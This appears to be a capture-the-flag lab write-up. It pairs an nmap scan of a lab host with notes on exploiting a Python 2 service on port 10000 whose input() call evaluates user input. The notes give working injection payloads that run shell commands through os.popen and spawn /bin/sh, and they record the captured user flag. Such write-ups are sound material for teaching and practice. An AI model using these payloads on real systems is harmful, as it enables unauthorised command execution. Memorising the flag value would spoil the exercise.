10.10.106.98

22/tcp    open  ssh               OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
|   256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
|_  256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
10000/tcp open  snet-sensor-mgmt?
| fingerprint-strings: 
|   GenericLines: 
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   GetRequest: 
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'GET' is not defined
|   HTTPOptions, RTSPRequest: 
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'OPTIONS' is not defined
|   NULL: 
|     Private 0days
|_    Please enther number of exploits to send??:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port10000-TCP:V=7.94SVN%I=7%D=10/15%Time=68EFAA5B%P=x86_64-pc-linux-gnu
SF:%r(NULL,48,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r\
SF:n\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x2
SF:0")%r(GetRequest,136,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200d
SF:ays\r\n\r\n\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20se
SF:nd\?\?:\x20Traceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20
SF:File\x20\"\./exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20
SF:\x20\x20num_exploits\x20=\x20int\(input\('\x20Please\x20enther\x20numbe
SF:r\x20of\x20exploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<s
SF:tring>\",\x20line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'GET
SF:'\x20is\x20not\x20defined\r\n")%r(HTTPOptions,13A,"\r\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\
SF:x20of\x20exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x
SF:20call\x20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\
SF:x20in\x20<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('
SF:\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20
SF:'\)\)\r\n\x20\x20File\x20\"<string>\",\x20line\x201,\x20in\x20<module>\
SF:r\nNameError:\x20name\x20'OPTIONS'\x20is\x20not\x20defined\r\n")%r(RTSP
SF:Request,13A,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r
SF:\n\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x
SF:20Traceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20File\x20\
SF:"\./exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20\x20\x20n
SF:um_exploits\x20=\x20int\(input\('\x20Please\x20enther\x20number\x20of\x
SF:20exploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",
SF:\x20line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'OPTIONS'\x20
SF:is\x20not\x20defined\r\n")%r(GenericLines,13B,"\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\x20o
SF:f\x20exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x20ca
SF:ll\x20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\x20i
SF:n\x20<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('\x20
SF:Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20'\)\
SF:)\r\n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x20\x20\x20\x20\r\n
SF:\x20\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20EOF\x20while\x20par
SF:sing\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel







Can connect to port 10000 over tcp and send commands.

sending this '__import__('os').popen('ls').read()' means we can inject sys commands into the script and therefore we see this:

ValueError: invalid literal for int() with base 10: 'credentials.png\nexploit.py\nroot.sh\nrun.sh\nuser.txt\n'


we can run: 

__import__('os').popen('cat user.txt').read()

to get the user flag:

cf85ff769cfaaa721758949bf870b019


we can gain an interactive shell with: 

__import__('os').system('/bin/sh')